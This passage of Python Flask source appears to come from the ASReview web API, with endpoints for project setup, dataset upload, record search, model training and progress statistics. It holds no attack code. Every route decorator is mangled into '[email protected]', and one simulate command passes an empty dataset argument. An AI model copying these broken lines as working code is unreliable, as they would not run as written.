methods=[\"POST\"])\n@asreview_login_required\ndef api_init_project(): # noqa: F401\n \"\"\"Initialize a new project\"\"\"\n\n project_mode = request.form[\"mode\"]\n project_title = request.form[\"name\"]\n project_description = request.form[\"description\"]\n project_authors = request.form[\"authors\"]\n\n # get a unique project id\n project_id = uuid4().hex\n\n # get path of this project\n project_path = get_project_path(project_id)\n\n project = ASReviewProject.create(\n project_path,\n project_id=project_id,\n project_mode=project_mode,\n project_name=project_title,\n project_description=project_description,\n project_authors=project_authors,\n )\n\n # create a database entry for this project\n if app_is_authenticated(current_app):\n current_user.projects.append(Project(project_id=project_id))\n DB.session.commit()\n\n response = jsonify(project.config)\n\n return response, 201\n\n\[email protected](\"/projects/<project_id>/upgrade_if_old\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_upgrade_project_if_old(project):\n \"\"\"Get upgrade project if it is v0.x\"\"\"\n\n if not project.config[\"version\"].startswith(\"0\"):\n response = jsonify(message=\"Can only convert v0.x projects.\")\n return response, 400\n\n # errors are handled by the InternalServerError\n upgrade_asreview_project_file(project.project_path)\n\n response = jsonify({\"success\": True})\n return response\n\n\[email protected](\"/projects/<project_id>/info\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_project_info(project): # noqa: F401\n \"\"\"\"\"\"\n project_config = project.config\n\n # upgrade info of v0 projects\n if project_config[\"version\"].startswith(\"0\"):\n project_config = upgrade_project_config(project_config)\n project_config[\"projectNeedsUpgrade\"] = True\n\n # add user_id of owner to response if authenticated\n if app_is_authenticated(current_app):\n db_project = Project.query.filter(\n Project.project_id == project.config.get(\"id\", 0)\n ).one_or_none()\n if db_project:\n project_config[\"ownerId\"] = db_project.owner_id\n\n return jsonify(project_config)\n\n\[email protected](\"/projects/<project_id>/info\", methods=[\"PUT\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_update_project_info(project): # noqa: F401\n \"\"\"Update project info\"\"\"\n\n project.update_config(\n mode=request.form[\"mode\"],\n name=request.form[\"name\"],\n description=request.form[\"description\"],\n authors=request.form[\"authors\"],\n )\n\n return api_get_project_info(project.project_id)\n\n\[email protected](\"/datasets\", methods=[\"GET\"])\n@asreview_login_required\ndef api_demo_data_project(): # noqa: F401\n \"\"\"\"\"\"\n\n subset = request.args.get(\"subset\", None)\n\n manager = DatasetManager()\n\n if subset == \"plugin\":\n try:\n result_datasets = manager.list(\n exclude=[\"builtin\", \"benchmark\", \"benchmark-nature\"]\n )\n\n except Exception as err:\n logging.error(err)\n return jsonify(message=\"Failed to load plugin datasets.\"), 500\n\n elif subset == \"benchmark\":\n try:\n # collect the datasets metadata\n result_datasets = manager.list(include=[\"synergy\", \"benchmark-nature\"])\n\n except Exception as err:\n logging.error(err)\n return jsonify(message=\"Failed to load benchmark datasets.\"), 500\n\n else:\n response = jsonify(message=\"demo-data-loading-failed\")\n\n return response, 400\n\n payload = {\"result\": result_datasets}\n response = 
jsonify(payload)\n return response\n\n\[email protected](\"/projects/<project_id>/data\", methods=[\"POST\", \"PUT\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_upload_data_to_project(project): # noqa: F401\n \"\"\"\"\"\"\n\n # get the project config to modify behavior of dataset\n project_config = project.config\n\n # remove old dataset if present\n if \"dataset_path\" in project_config and project_config[\"dataset_path\"] is not None:\n logging.warning(\"Removing old dataset and adding new dataset.\")\n project.remove_dataset()\n\n # create dataset folder if not present\n Path(project.project_path, \"data\").mkdir(exist_ok=True)\n\n if request.form.get(\"plugin\", None):\n ds = DatasetManager().find(request.form[\"plugin\"])\n filename = ds.filename\n ds.to_file(Path(project.project_path, \"data\", filename))\n\n elif request.form.get(\"benchmark\", None):\n ds = DatasetManager().find(request.form[\"benchmark\"])\n filename = ds.filename\n ds.to_file(Path(project.project_path, \"data\", filename))\n\n elif request.form.get(\"url\", None):\n url = request.form.get(\"url\")\n\n # check if the url value is actually a DOI without a netloc\n if url.startswith(\"10.\"):\n url = f\"https://doi.org/{url}\"\n\n filename = _get_filename_from_url(url)\n\n if bool(request.form.get(\"validate\", None)):\n reader_keys = list_reader_names()\n\n if (\n filename\n and Path(filename).suffix\n and Path(filename).suffix in reader_keys\n ):\n return jsonify(files=[{\"link\": url, \"name\": filename}]), 201\n elif filename and not Path(filename).suffix:\n raise BadFileFormatError(\"Can't determine file format.\")\n else:\n try:\n # get file list from datahugger\n dh = datahugger.info(url)\n files = dh.files.copy()\n\n for i, f in enumerate(files):\n files[i][\"disabled\"] = (\n Path(files[i][\"name\"]).suffix not in reader_keys\n )\n\n return jsonify(files=files), 201\n except Exception:\n raise BadFileFormatError(\"Can't retrieve files.\")\n\n try:\n urlretrieve(url, Path(project.project_path, \"data\") / filename)\n except Exception as err:\n logging.error(err)\n message = f\"Can't retrieve data from URL {url}.\"\n\n return jsonify(message=message), 400\n\n elif \"file\" in request.files:\n data_file = request.files[\"file\"]\n\n # check that the file is in a correct format\n # check_dataset(data_file)\n try:\n filename = secure_filename(data_file.filename)\n fp_data = Path(project.project_path, \"data\") / filename\n\n # save the file\n data_file.save(str(fp_data))\n\n except Exception as err:\n logging.error(err)\n\n response = jsonify(message=f\"Failed to import file '{filename}'. 
{err}\")\n\n return response, 400\n else:\n response = jsonify(message=\"No file or dataset found to import.\")\n return response, 400\n\n if project_config[\"mode\"] == PROJECT_MODE_EXPLORE:\n data_path_raw = Path(project.project_path, \"data\") / filename\n data_path = data_path_raw.with_suffix(\".csv\")\n\n data = ASReviewData.from_file(data_path_raw)\n\n if data.labels is None:\n raise ValueError(\"Import fully labeled dataset.\")\n\n data.df.rename(\n {data.column_spec[\"included\"]: \"debug_label\"}, axis=1, inplace=True\n )\n data.to_file(data_path)\n\n elif project_config[\"mode\"] == PROJECT_MODE_SIMULATE:\n data_path_raw = Path(project.project_path, \"data\") / filename\n data_path = data_path_raw.with_suffix(\".csv\")\n\n data = ASReviewData.from_file(data_path_raw)\n\n if data.labels is None:\n raise ValueError(\"Import fully labeled dataset.\")\n\n data.df[\"debug_label\"] = data.df[data.column_spec[\"included\"]]\n data.to_file(data_path)\n\n else:\n data_path = Path(project.project_path, \"data\") / filename\n\n try:\n # add the file to the project\n project.add_dataset(data_path.name)\n\n # Bad format. TODO{Jonathan} Return informative message with link.\n except BadFileFormatError as err:\n message = f\"Failed to import file '{filename}'. {err}\"\n return jsonify(message=message), 400\n\n response = jsonify({\"project_id\": project.project_id})\n\n return response\n\n\[email protected](\"/projects/<project_id>/data\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_project_data(project): # noqa: F401\n \"\"\"\"\"\"\n\n try:\n # get statistics of the dataset\n as_data = read_data(project)\n\n statistics = {\n \"n_rows\": as_data.df.shape[0],\n \"n_cols\": as_data.df.shape[1],\n \"n_duplicates\": n_duplicates(as_data),\n \"filename\": Path(project.config[\"dataset_path\"]).stem,\n }\n\n except FileNotFoundError as err:\n logging.info(err)\n statistics = {\"filename\": None}\n\n return jsonify(statistics)\n\n\[email protected](\"/projects/<project_id>/dataset_writer\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_list_dataset_writers(project):\n \"\"\"List the name and label of available dataset writer\"\"\"\n\n fp_data = Path(project.config[\"dataset_path\"])\n\n readers = list_readers()\n writers = list_writers()\n\n # get write format for the data file\n write_format = None\n for c in readers:\n if fp_data.suffix in c.read_format:\n if write_format is None:\n write_format = c.write_format\n\n # get available writers\n payload = {\"result\": []}\n for c in writers:\n payload[\"result\"].append(\n {\n \"enabled\": True if c.write_format in write_format else False,\n \"name\": c.name,\n \"label\": c.label,\n \"caution\": c.caution if hasattr(c, \"caution\") else None,\n }\n )\n\n if not payload[\"result\"]:\n return (\n jsonify(message=f\"No dataset writer available for {fp_data.suffix} file.\"),\n 500,\n )\n\n # remove duplicate writers\n payload[\"result\"] = [\n i\n for n, i in enumerate(payload[\"result\"])\n if i not in payload[\"result\"][(n + 1) :]\n ]\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/search\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_search_data(project): # noqa: F401\n \"\"\"Search for papers\"\"\"\n q = request.args.get(\"q\", default=None, type=str)\n max_results = request.args.get(\"n_max\", default=10, type=int)\n\n project_mode = project.config[\"mode\"]\n\n payload 
= {\"result\": []}\n if q:\n # read the dataset\n as_data = read_data(project)\n\n # read record_ids of labels from state\n with open_state(project.project_path) as s:\n labeled_record_ids = s.get_dataset([\"record_id\"])[\"record_id\"].to_list()\n\n try:\n # search for the keywords\n result_idx = fuzzy_find(\n as_data,\n q,\n max_return=max_results,\n exclude=labeled_record_ids,\n by_index=True,\n )\n except SearchError as err:\n raise ValueError(err) from err\n\n for record in as_data.record(result_idx):\n debug_label = record.extra_fields.get(\"debug_label\", None)\n debug_label = int(debug_label) if pd.notnull(debug_label) else None\n\n if project_mode == PROJECT_MODE_SIMULATE:\n # ignore existing labels\n included = -1\n else:\n included = int(record.included)\n\n payload[\"result\"].append(\n {\n \"id\": int(record.record_id),\n \"title\": record.title,\n \"abstract\": record.abstract,\n \"authors\": record.authors,\n \"keywords\": record.keywords,\n \"included\": included,\n \"_debug_label\": debug_label,\n }\n )\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/labeled\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_labeled(project): # noqa: F401\n \"\"\"Get all papers classified as labeled documents\"\"\"\n\n page = request.args.get(\"page\", default=None, type=int)\n per_page = request.args.get(\"per_page\", default=20, type=int)\n subset = request.args.getlist(\"subset\")\n latest_first = request.args.get(\"latest_first\", default=1, type=int)\n\n with open_state(project.project_path) as s:\n data = s.get_dataset([\"record_id\", \"label\", \"query_strategy\", \"notes\"])\n data[\"prior\"] = (data[\"query_strategy\"] == \"prior\").astype(int)\n\n if any(s in subset for s in [\"relevant\", \"included\"]):\n data = data[data[\"label\"] == 1]\n elif any(s in subset for s in [\"irrelevant\", \"excluded\"]):\n data = data[data[\"label\"] == 0]\n else:\n data = data[~data[\"label\"].isnull()]\n\n if \"note\" in subset:\n data = data[~data[\"notes\"].isnull()]\n\n if \"prior\" in subset:\n data = data[data[\"prior\"] == 1]\n\n if latest_first == 1:\n data = data.iloc[::-1]\n\n # count labeled records and max pages\n count = len(data)\n if count == 0:\n payload = {\n \"count\": 0,\n \"next_page\": None,\n \"previous_page\": None,\n \"result\": [],\n }\n response = jsonify(payload)\n\n return response\n\n max_page_calc = divmod(count, per_page)\n if max_page_calc[1] == 0:\n max_page = max_page_calc[0]\n else:\n max_page = max_page_calc[0] + 1\n\n if page is not None:\n # slice out records on specific page\n if page <= max_page:\n idx_start = page * per_page - per_page\n idx_end = page * per_page\n data = data.iloc[idx_start:idx_end, :].copy()\n else:\n return abort(404)\n\n # set next & previous page\n if page < max_page:\n next_page = page + 1\n if page > 1:\n previous_page = page - 1\n else:\n previous_page = None\n else:\n next_page = None\n previous_page = page - 1\n else:\n next_page = None\n previous_page = None\n\n records = read_data(project).record(data[\"record_id\"])\n\n payload = {\n \"count\": count,\n \"next_page\": next_page,\n \"previous_page\": previous_page,\n \"result\": [],\n }\n for i, record in zip(data.index.tolist(), records):\n payload[\"result\"].append(\n {\n \"id\": int(record.record_id),\n \"title\": record.title,\n \"abstract\": record.abstract,\n \"authors\": record.authors,\n \"keywords\": record.keywords,\n \"doi\": record.doi,\n \"url\": record.url,\n \"included\": 
int(data.loc[i, \"label\"]),\n \"note\": data.loc[i, \"notes\"],\n \"prior\": int(data.loc[i, \"prior\"]),\n }\n )\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/labeled_stats\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_labeled_stats(project): # noqa: F401\n \"\"\"Get all papers classified as prior documents\"\"\"\n\n try:\n with open_state(project.project_path) as s:\n data = s.get_dataset([\"label\", \"query_strategy\"])\n data_prior = data[data[\"query_strategy\"] == \"prior\"]\n\n return jsonify(\n {\n \"n\": len(data),\n \"n_inclusions\": sum(data[\"label\"] == 1),\n \"n_exclusions\": sum(data[\"label\"] == 0),\n \"n_prior\": len(data_prior),\n \"n_prior_inclusions\": sum(data_prior[\"label\"] == 1),\n \"n_prior_exclusions\": sum(data_prior[\"label\"] == 0),\n }\n )\n except StateNotFoundError:\n return jsonify(\n {\n \"n\": 0,\n \"n_inclusions\": 0,\n \"n_exclusions\": 0,\n \"n_prior\": 0,\n \"n_prior_inclusions\": 0,\n \"n_prior_exclusions\": 0,\n }\n )\n\n\[email protected](\"/projects/<project_id>/prior_random\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_random_prior_papers(project): # noqa: F401\n \"\"\"Get a selection of random records.\n\n This set of records is extracted from the pool, but without\n the already labeled items.\n \"\"\"\n\n # get the number of records to return\n n = request.args.get(\"n\", default=5, type=int)\n # get the subset of records to return (for exploration and simulation mode)\n subset = request.args.get(\"subset\", default=None, type=str)\n\n with open_state(project.project_path) as state:\n pool = state.get_pool().values\n\n as_data = read_data(project)\n\n payload = {\"result\": []}\n\n if subset in [\"relevant\", \"included\"]:\n rel_indices = as_data.df[as_data.df[\"debug_label\"] == 1].index.values\n rel_indices_pool = np.intersect1d(pool, rel_indices)\n\n if len(rel_indices_pool) == 0:\n return jsonify(payload)\n elif n > len(rel_indices_pool):\n rand_pool_relevant = np.random.choice(\n rel_indices_pool, len(rel_indices_pool), replace=False\n )\n else:\n rand_pool = np.random.choice(pool, n, replace=False)\n rand_pool_relevant = np.random.choice(rel_indices_pool, n, replace=False)\n\n try:\n relevant_records = as_data.record(rand_pool_relevant)\n except Exception as err:\n logging.error(err)\n return jsonify(message=f\"Failed to load random records. {err}\"), 500\n\n for rr in relevant_records:\n payload[\"result\"].append(\n {\n \"id\": int(rr.record_id),\n \"title\": rr.title,\n \"abstract\": rr.abstract,\n \"authors\": rr.authors,\n \"keywords\": rr.keywords,\n \"included\": None,\n \"_debug_label\": 1,\n }\n )\n\n elif subset in [\"irrelevant\", \"excluded\"]:\n irrel_indices = as_data.df[as_data.df[\"debug_label\"] == 0].index.values\n irrel_indices_pool = np.intersect1d(pool, irrel_indices)\n\n if len(irrel_indices_pool) == 0:\n return jsonify(payload)\n elif n > len(irrel_indices_pool):\n rand_pool_irrelevant = np.random.choice(\n irrel_indices_pool, len(irrel_indices_pool), replace=False\n )\n else:\n rand_pool_irrelevant = np.random.choice(\n irrel_indices_pool, n, replace=False\n )\n\n try:\n irrelevant_records = as_data.record(rand_pool_irrelevant)\n except Exception as err:\n logging.error(err)\n return jsonify(message=f\"Failed to load random records. 
{err}\"), 500\n\n for ir in irrelevant_records:\n payload[\"result\"].append(\n {\n \"id\": int(ir.record_id),\n \"title\": ir.title,\n \"abstract\": ir.abstract,\n \"authors\": ir.authors,\n \"keywords\": ir.keywords,\n \"included\": None,\n \"_debug_label\": 0,\n }\n )\n\n else:\n if len(pool) == 0:\n return jsonify(payload)\n elif n > len(pool):\n rand_pool = np.random.choice(pool, len(pool), replace=False)\n else:\n rand_pool = np.random.choice(pool, n, replace=False)\n\n try:\n records = as_data.record(rand_pool)\n except Exception as err:\n logging.error(err)\n return jsonify(message=f\"Failed to load random records. {err}\"), 500\n\n for r in records:\n payload[\"result\"].append(\n {\n \"id\": int(r.record_id),\n \"title\": r.title,\n \"abstract\": r.abstract,\n \"authors\": r.authors,\n \"keywords\": r.keywords,\n \"included\": None,\n \"_debug_label\": None,\n }\n )\n\n return jsonify(payload)\n\n\[email protected](\"/algorithms\", methods=[\"GET\"])\n@asreview_login_required\ndef api_list_algorithms():\n \"\"\"List the names and labels of available algorithms\"\"\"\n\n classes = [\n list_balance_strategies(),\n list_classifiers(),\n list_feature_extraction(),\n list_query_strategies(),\n ]\n\n payload = {\n \"balance_strategy\": [],\n \"classifier\": [],\n \"feature_extraction\": [],\n \"query_strategy\": [],\n }\n\n for c, key in zip(classes, payload.keys()):\n for method in c:\n if hasattr(method, \"label\"):\n payload[key].append({\"name\": method.name, \"label\": method.label})\n else:\n payload[key].append({\"name\": method.name, \"label\": method.name})\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/algorithms\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_algorithms(project): # noqa: F401\n default_payload = {\n \"model\": DEFAULT_MODEL,\n \"feature_extraction\": DEFAULT_FEATURE_EXTRACTION,\n \"query_strategy\": DEFAULT_QUERY_STRATEGY,\n \"balance_strategy\": DEFAULT_BALANCE_STRATEGY,\n }\n\n # check if there were algorithms stored in the state file\n try:\n with open_state(project.project_path) as state:\n if state.settings is not None:\n payload = {\n \"model\": state.settings.model,\n \"feature_extraction\": state.settings.feature_extraction,\n \"query_strategy\": state.settings.query_strategy,\n \"balance_strategy\": state.settings.balance_strategy,\n }\n else:\n payload = default_payload\n except StateNotFoundError:\n payload = default_payload\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/algorithms\", methods=[\"POST\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_set_algorithms(project): # noqa: F401\n # TODO@{Jonathan} validate model choice on server side\n ml_model = request.form.get(\"model\", None)\n ml_query_strategy = request.form.get(\"query_strategy\", None)\n ml_balance_strategy = request.form.get(\"balance_strategy\", None)\n ml_feature_extraction = request.form.get(\"feature_extraction\", None)\n\n # create a new settings object from arguments\n # only used if state file is not present\n asreview_settings = ASReviewSettings(\n model=ml_model,\n query_strategy=ml_query_strategy,\n balance_strategy=ml_balance_strategy,\n feature_extraction=ml_feature_extraction,\n model_param=get_classifier(ml_model).param,\n query_param=get_query_model(ml_query_strategy).param,\n balance_param=get_balance_model(ml_balance_strategy).param,\n feature_param=get_feature_model(ml_feature_extraction).param,\n )\n\n # save the new 
settings to the state file\n with open_state(project.project_path, read_only=False) as state:\n state.settings = asreview_settings\n\n response = jsonify({\"success\": True})\n\n return response\n\n\[email protected](\"/projects/<project_id>/start\", methods=[\"POST\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_start(project): # noqa: F401\n \"\"\"Start training of first model or simulation.\"\"\"\n\n # the project is a simulation project\n if project.config[\"mode\"] == PROJECT_MODE_SIMULATE:\n # get priors\n with open_state(project.project_path) as s:\n priors = s.get_priors()[\"record_id\"].tolist()\n\n logging.info(\"Start simulation\")\n\n try:\n datafile = project.config[\"dataset_path\"]\n logging.info(\"Project data file found: {}\".format(datafile))\n\n # start simulation\n py_exe = _get_executable()\n run_command = (\n [\n # get executable\n py_exe,\n # get module\n \"-m\",\n \"asreview\",\n # run simulation via cli\n \"simulate\",\n # specify dataset\n \"\",\n # specify prior indices\n \"--prior_idx\",\n ]\n + list(map(str, priors))\n + [\n # specify state file\n \"--state_file\",\n str(project.project_path),\n # specify write interval\n \"--write_interval\",\n \"100\",\n ]\n )\n subprocess.Popen(run_command)\n\n except Exception as err:\n logging.error(err)\n message = f\"Failed to get data file. {err}\"\n return jsonify(message=message), 400\n\n # the project is an oracle or explore project\n else:\n logging.info(\"Train first iteration of model\")\n try:\n # start training the model\n py_exe = _get_executable()\n run_command = [\n # get executable\n py_exe,\n # get module\n \"-m\",\n \"asreview\",\n # train the model via cli\n \"web_run_model\",\n # specify project id\n str(project.project_path),\n # output the error of the first model\n \"--output_error\",\n # mark the first run for status update\n \"--first_run\",\n ]\n subprocess.Popen(run_command)\n\n except Exception as err:\n logging.error(err)\n return jsonify(message=\"Failed to train the model.\"), 500\n\n response = jsonify({\"success\": True})\n\n return response\n\n\[email protected](\"/projects/<project_id>/status\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_status(project): # noqa: F401\n \"\"\"Check the status of the review\"\"\"\n\n try:\n status = project.reviews[0][\"status\"]\n except Exception:\n status = None\n\n if status == \"error\":\n error_path = project.project_path / \"error.json\"\n if error_path.exists():\n logging.error(\"Error on training\")\n with open(error_path, \"r\") as f:\n error_message = json.load(f)[\"message\"]\n\n raise Exception(error_message)\n\n response = jsonify({\"status\": status})\n\n return response\n\n\[email protected](\"/projects/<project_id>/status\", methods=[\"PUT\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_status_update(project):\n \"\"\"Update the status of the review.\n\n The following status updates are allowed for\n oracle and explore:\n - `review` to `finished`\n - `finished` to `review` if not pool empty\n - `error` to `setup`\n\n The following status updates are allowed for simulate\n - `error` to `setup`\n\n Status updates by the user are not allowed in simulation\n mode.\n\n \"\"\"\n\n status = request.form.get(\"status\", type=str)\n\n current_status = project.config[\"reviews\"][0][\"status\"]\n mode = project.config[\"mode\"]\n\n if current_status == \"error\" and status == \"setup\":\n project.remove_error(status=status)\n\n 
response = jsonify({\"success\": True})\n\n return response\n\n if mode == PROJECT_MODE_SIMULATE:\n raise ValueError(\"Not possible to update status of simulation project.\")\n else:\n if current_status == \"review\" and status == \"finished\":\n project.update_review(status=status)\n elif current_status == \"finished\" and status == \"review\":\n project.update_review(status=status)\n # ideally, also check here for empty pool\n else:\n raise ValueError(\n f\"Not possible to update status from {current_status} to {status}\"\n )\n\n response = jsonify({\"success\": True})\n\n return response\n\n\[email protected](\"/projects/import_project\", methods=[\"POST\"])\n@asreview_login_required\ndef api_import_project():\n \"\"\"Import project\"\"\"\n\n # raise error if file not given\n if \"file\" not in request.files:\n response = jsonify(message=\"No ASReview file found to import.\")\n return response, 400\n\n try:\n project = ASReviewProject.load(\n request.files[\"file\"],\n asreview_path(),\n safe_import=True\n )\n\n # create a database entry for this project\n if app_is_authenticated(current_app):\n current_user.projects.append(\n Project(project_id=project.config.get(\"id\"))\n )\n project.config[\"owner_id\"] = current_user.id\n DB.session.commit()\n\n except Exception as err:\n logging.error(err)\n raise ValueError(\"Failed to import project.\")\n\n return jsonify(project.config)\n\n\[email protected](\"/projects/<project_id>/export_dataset\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_export_dataset(project):\n \"\"\"Export dataset with relevant/irrelevant labels\"\"\"\n\n # get the export args\n file_format = request.args.get(\"file_format\", None)\n dataset_label = request.args.get(\"dataset_label\", default=\"all\")\n\n # create temporary folder to store exported dataset\n tmp_path = tempfile.TemporaryDirectory()\n tmp_path_dataset = Path(tmp_path.name, f\"export_dataset.{file_format}\")\n\n try:\n # get labels and ranking from state file\n with open_state(project.project_path) as s:\n pool, labeled, pending = s.get_pool_labeled_pending()\n # get state dataset for accessing notes\n state_df = s.get_dataset().set_index(\"record_id\")\n\n included = labeled[labeled[\"label\"] == 1]\n excluded = labeled[labeled[\"label\"] != 1]\n\n if dataset_label == \"relevant\":\n export_order = included[\"record_id\"].to_list()\n labeled = included\n else:\n export_order = (\n included[\"record_id\"].to_list()\n + pending.to_list()\n + pool.to_list()\n + excluded[\"record_id\"].to_list()\n )\n\n # get writer corresponding to specified file format\n writers = list_writers()\n writer = None\n for c in writers:\n if writer is None:\n if c.name == file_format:\n writer = c\n\n # read the dataset into a ASReview data object\n as_data = read_data(project)\n\n # Adding Notes from State file to the exported dataset\n # Check if exported_notes column already exists due to multiple screenings\n screening = 0\n for col in as_data.df:\n if col == \"exported_notes\":\n screening = 0\n elif col.startswith(\"exported_notes\"):\n try:\n screening = int(col.split(\"_\")[2])\n except IndexError:\n screening = 0\n screening += 1\n\n state_df.rename(\n columns={\n \"notes\": f\"exported_notes_{screening}\",\n },\n inplace=True,\n )\n\n as_data.df = as_data.df.join(\n state_df[f\"exported_notes_{screening}\"], on=\"record_id\"\n )\n\n as_data.to_file(\n fp=tmp_path_dataset,\n labels=labeled.values.tolist(),\n ranking=export_order,\n writer=writer,\n )\n\n return 
send_file(\n tmp_path_dataset,\n as_attachment=True,\n max_age=0,\n )\n\n except Exception as err:\n raise Exception(f\"Failed to export the {file_format} dataset. {err}\")\n\n\[email protected](\"/projects/<project_id>/export_project\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef export_project(project):\n \"\"\"Export the project file.\n\n The ASReview project file is a file with .asreview extension.\n The ASReview project file is a zipped file and contains\n all information to continue working on the project as well\n as the original dataset.\n \"\"\"\n\n # create a temp folder to zip\n tmpdir = tempfile.TemporaryDirectory()\n tmpfile = Path(tmpdir.name, project.project_id).with_suffix(\".asreview\")\n\n logging.info(\"Saving project (temporary) to %s\", tmpfile)\n project.export(tmpfile)\n\n return send_file(\n tmpfile,\n as_attachment=True,\n max_age=0,\n )\n\n\ndef _get_stats(project, include_priors=False):\n if is_v0_project(project.project_path):\n json_fp = Path(project.project_path, \"result.json\")\n\n # Check if the v0 project is in review.\n if json_fp.exists():\n with open(json_fp, \"r\") as f:\n s = json.load(f)\n\n # Get the labels.\n labels = np.array(\n [\n int(sample_data[1])\n for query in range(len(s[\"results\"]))\n for sample_data in s[\"results\"][query][\"labelled\"]\n ]\n )\n\n # Get the record table.\n data_hash = list(s[\"data_properties\"].keys())[0]\n record_table = s[\"data_properties\"][data_hash][\"record_table\"]\n\n n_records = len(record_table)\n\n # No result found.\n else:\n labels = np.array([])\n n_records = 0\n else:\n # Check if there is a review started in the project.\n try:\n # get label history\n with open_state(project.project_path) as s:\n if (\n project.config[\"reviews\"][0][\"status\"] == \"finished\"\n and project.config[\"mode\"] == PROJECT_MODE_SIMULATE\n ):\n labels = _get_labels(s, priors=include_priors)\n else:\n labels = s.get_labels(priors=include_priors)\n\n n_records = len(s.get_record_table())\n\n # No state file found or not init.\n except (StateNotFoundError, StateError):\n labels = np.array([])\n n_records = 0\n\n n_included = int(sum(labels == 1))\n n_excluded = int(sum(labels == 0))\n\n if n_included > 0:\n n_since_last_relevant = int(labels.tolist()[::-1].index(1))\n else:\n n_since_last_relevant = 0\n\n return {\n \"n_included\": n_included,\n \"n_excluded\": n_excluded,\n \"n_since_last_inclusion\": n_since_last_relevant,\n \"n_papers\": n_records,\n \"n_pool\": n_records - n_excluded - n_included,\n }\n\n\ndef _get_labels(state_obj, priors=False):\n # get the number of records\n n_records = state_obj.n_records\n\n # get the labels\n labels = state_obj.get_labels(priors=priors).to_list()\n\n # if less labels than records, fill with 0\n if len(labels) < n_records:\n labels += [0] * (n_records - len(labels))\n labels = pd.Series(labels)\n\n return labels\n\n\[email protected](\"/projects/<project_id>/progress\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_progress_info(project): # noqa: F401\n \"\"\"Get progress statistics of a project\"\"\"\n\n include_priors = request.args.get(\"priors\", True, type=bool)\n\n response = jsonify(_get_stats(project, include_priors=include_priors))\n\n # return a success response to the client.\n return response\n\n\[email protected](\"/projects/<project_id>/progress_density\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef 
api_get_progress_density(project):\n \"\"\"Get progress density of a project\"\"\"\n\n include_priors = request.args.get(\"priors\", False, type=bool)\n\n # get label history\n with open_state(project.project_path) as s:\n if (\n project.config[\"reviews\"][0][\"status\"] == \"finished\"\n and project.config[\"mode\"] == PROJECT_MODE_SIMULATE\n ):\n data = _get_labels(s, priors=include_priors)\n else:\n data = s.get_labels(priors=include_priors)\n\n # create a dataset with the rolling mean of every 10 papers\n df = (\n data.to_frame(name=\"Relevant\")\n .reset_index(drop=True)\n .rolling(10, min_periods=1)\n .mean()\n )\n df[\"Total\"] = df.index + 1\n\n # transform mean(percentage) to number\n for i in range(0, len(df)):\n if df.loc[i, \"Total\"] < 10:\n df.loc[i, \"Irrelevant\"] = (1 - df.loc[i, \"Relevant\"]) * df.loc[i, \"Total\"]\n df.loc[i, \"Relevant\"] = df.loc[i, \"Total\"] - df.loc[i, \"Irrelevant\"]\n else:\n df.loc[i, \"Irrelevant\"] = (1 - df.loc[i, \"Relevant\"]) * 10\n df.loc[i, \"Relevant\"] = 10 - df.loc[i, \"Irrelevant\"]\n\n df = df.round(1).to_dict(orient=\"records\")\n for d in df:\n d[\"x\"] = d.pop(\"Total\")\n\n df_relevant = [{k: v for k, v in d.items() if k != \"Irrelevant\"} for d in df]\n for d in df_relevant:\n d[\"y\"] = d.pop(\"Relevant\")\n\n df_irrelevant = [{k: v for k, v in d.items() if k != \"Relevant\"} for d in df]\n for d in df_irrelevant:\n d[\"y\"] = d.pop(\"Irrelevant\")\n\n payload = {\"relevant\": df_relevant, \"irrelevant\": df_irrelevant}\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/progress_recall\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_progress_recall(project):\n \"\"\"Get cumulative number of inclusions by ASReview/at random\"\"\"\n\n include_priors = request.args.get(\"priors\", False, type=bool)\n\n with open_state(project.project_path) as s:\n if (\n project.config[\"reviews\"][0][\"status\"] == \"finished\"\n and project.config[\"mode\"] == PROJECT_MODE_SIMULATE\n ):\n data = _get_labels(s, priors=include_priors)\n else:\n data = s.get_labels(priors=include_priors)\n\n n_records = len(s.get_record_table())\n\n # create a dataset with the cumulative number of inclusions\n df = data.to_frame(name=\"Relevant\").reset_index(drop=True).cumsum()\n df[\"Total\"] = df.index + 1\n df[\"Random\"] = (df[\"Total\"] * (df[\"Relevant\"][-1:] / n_records).values).round()\n\n df = df.round(1).to_dict(orient=\"records\")\n for d in df:\n d[\"x\"] = d.pop(\"Total\")\n\n df_asreview = [{k: v for k, v in d.items() if k != \"Random\"} for d in df]\n for d in df_asreview:\n d[\"y\"] = d.pop(\"Relevant\")\n\n df_random = [{k: v for k, v in d.items() if k != \"Relevant\"} for d in df]\n for d in df_random:\n d[\"y\"] = d.pop(\"Random\")\n\n payload = {\"asreview\": df_asreview, \"random\": df_random}\n\n return jsonify(payload)\n\n\[email 